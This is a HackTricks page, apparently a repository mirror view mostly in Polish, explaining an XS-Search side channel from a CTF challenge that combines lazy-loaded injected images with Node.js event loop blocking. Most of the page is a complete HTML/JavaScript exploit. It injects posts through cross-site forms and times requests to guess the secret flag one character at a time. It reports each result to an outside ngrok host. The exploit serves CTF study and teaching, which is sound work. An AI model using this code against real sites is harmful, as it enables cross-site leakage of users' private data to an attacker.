2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-21 08:28:27 +00:00
hacktricks/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md

170 lines
7 KiB
Markdown
Raw Normal View History

# Event Loop Blocking + Lazy images
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2022-10-12 19:31:39 +00:00
<details>
<summary>Support HackTricks</summary>
2022-10-12 19:31:39 +00:00
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-10-12 19:31:39 +00:00
</details>
{% endhint %}
2022-10-12 19:31:39 +00:00
W [**tym exploicie**](https://gist.github.com/aszx87410/155f8110e667bae3d10a36862870ba45), [**@aszx87410**](https://twitter.com/aszx87410) łączy technikę **lazy image side channel** poprzez wstrzyknięcie HTML z rodzajem **event loop blocking technique** do wycieku znaków.
2022-10-12 19:31:39 +00:00
To jest **inny exploit dla wyzwania CTF**, które zostało już skomentowane na następującej stronie. Zobacz więcej informacji na temat wyzwania:
2022-10-12 19:31:39 +00:00
{% content-ref url="connection-pool-example.md" %}
[connection-pool-example.md](connection-pool-example.md)
{% endcontent-ref %}
Pomysł stojący za tym exploitem to:
2022-10-12 19:31:39 +00:00
* Posty są ładowane alfabetycznie
* **Napastnik** może **wstrzyknąć** **post** zaczynający się od **"A"**, wtedy jakiś **tag HTML** (jak duży **`<canvas`**) wypełni większość **ekranu** i kilka końcowych **`<img lazy` tags** do załadowania rzeczy.
* Jeśli zamiast "A" **napastnik wstrzyknie ten sam post, ale zaczynający się od "z".** **Post** z **flagą** pojawi się **pierwszy**, potem **wstrzyknięty** **post** pojawi się z początkowym "z" i **dużym** **canvas**. Ponieważ post z flagą pojawił się pierwszy, pierwszy canvas zajmie cały ekran, a końcowe **`<img lazy`** tagi wstrzyknięte **nie będą widoczne** na ekranie, więc **nie będą załadowane**.
* Następnie, **podczas** gdy bot **uzyskuje dostęp** do strony, **napastnik** będzie **wysyłał zapytania fetch**.&#x20;
* Jeśli **obrazy** wstrzyknięte w poście są **ładowane**, te **zapytania fetch** będą trwały **dłużej**, więc napastnik wie, że **post jest przed flagą** (alfabetycznie).
* Jeśli **zapytania fetch****szybkie**, oznacza to, że **post** jest **alfabetycznie** **po** fladze.
2022-10-12 19:31:39 +00:00
2024-02-11 01:46:25 +00:00
Sprawdźmy kod:
2022-10-12 19:31:39 +00:00
```html
<!DOCTYPE html>
<html>
<!--
2024-02-11 01:46:25 +00:00
The basic idea is to create a post with a lot of images which send request to "/" to block server-side nodejs event loop.
If images are loading, the request to "/" is slower, otherwise faster.
By using a well-crafted height, we can let note with "A" load image but note with "Z" not load.
We can use fetch to measure the request time.
2022-10-12 19:31:39 +00:00
-->
<body>
2024-02-11 01:46:25 +00:00
<button onclick="run()">start</button>
<!-- Inject post with payload -->
<form id=f action="http://localhost:1234/create" method="POST" target="_blank">
<input id=inp name="text" value="">
</form>
<!-- Remove index -->
<form id=f2 action="http://localhost:1234/remove" method="POST" target="_blank">
<input id=inp2 name="index" value="">
</form>
<script>
let flag = 'SEKAI{'
const TARGET = 'https://safelist.ctf.sekai.team'
f.action = TARGET + '/create'
f2.action = TARGET + '/remove'
const sleep = ms => new Promise(r => setTimeout(r, ms))
// Function to leak info to attacker
const send = data => fetch('http://server.ngrok.io?d='+data)
const charset = 'abcdefghijklmnopqrstuvwxyz'.split('')
// start exploit
let count = 0
setTimeout(async () => {
let L = 0
let R = charset.length - 1
// I have omited code here as apparently it wasn't necesary
// fallback to linerar since I am not familiar with binary search lol
for(let i=R; i>=L; i--) {
let c = charset[i]
send('try_' + flag + c)
const found = await testChar(flag + c)
if (found) {
send('found: '+ flag+c)
flag += c
break
}
}
}, 0)
async function testChar(str) {
return new Promise(resolve => {
/*
For 3350, you need to test it on your local to get this number.
The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold
If starts with "A", the image should be loaded because it's in the threshold.
*/
// <canvas height="3350px"> is experimental and allow to show the injected
// images when the post injected is the first one but to hide them when
// the injected post is after the post with the flag
inp.value = str + '<br><canvas height="3350px"></canvas><br>'+Array.from({length:20}).map((_,i)=>`<img loading=lazy src=/?${i}>`).join('')
f.submit()
setTimeout(() => {
run(str, resolve)
}, 500)
})
}
async function run(str, resolve) {
// Open posts page 5 times
for(let i=1; i<=5;i++) {
window.open(TARGET)
}
let t = 0
const round = 30 //Lets time 30 requests
setTimeout(async () => {
// Send 30 requests and time each
for(let i=0; i<round; i++) {
let s = performance.now()
await fetch(TARGET + '/?test', {
mode: 'no-cors'
}).catch(err=>1)
let end = performance.now()
t += end - s
console.log(end - s)
}
const avg = t/round
// Send info about how much time it took
send(str + "," + t + "," + "avg:" + avg)
/*
I get this threshold(1000ms) by trying multiple times on remote admin bot
for example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold
*/
const isFound = (t >= 1000)
if (isFound) {
inp2.value = "0"
} else {
inp2.value = "1"
}
// remember to delete the post to not break our leak oracle
f2.submit()
setTimeout(() => {
resolve(isFound)
}, 200)
}, 200)
}
</script>
2022-10-12 19:31:39 +00:00
</body>
</html>
```
{% hint style="success" %}
Ucz się i ćwicz Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Ucz się i ćwicz Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2022-10-12 19:31:39 +00:00
<details>
<summary>Wsparcie HackTricks</summary>
2022-10-12 19:31:39 +00:00
* Sprawdź [**plany subskrypcyjne**](https://github.com/sponsors/carlospolop)!
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Dziel się trikami hackingowymi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów na githubie.
2022-10-12 19:31:39 +00:00
</details>
{% endhint %}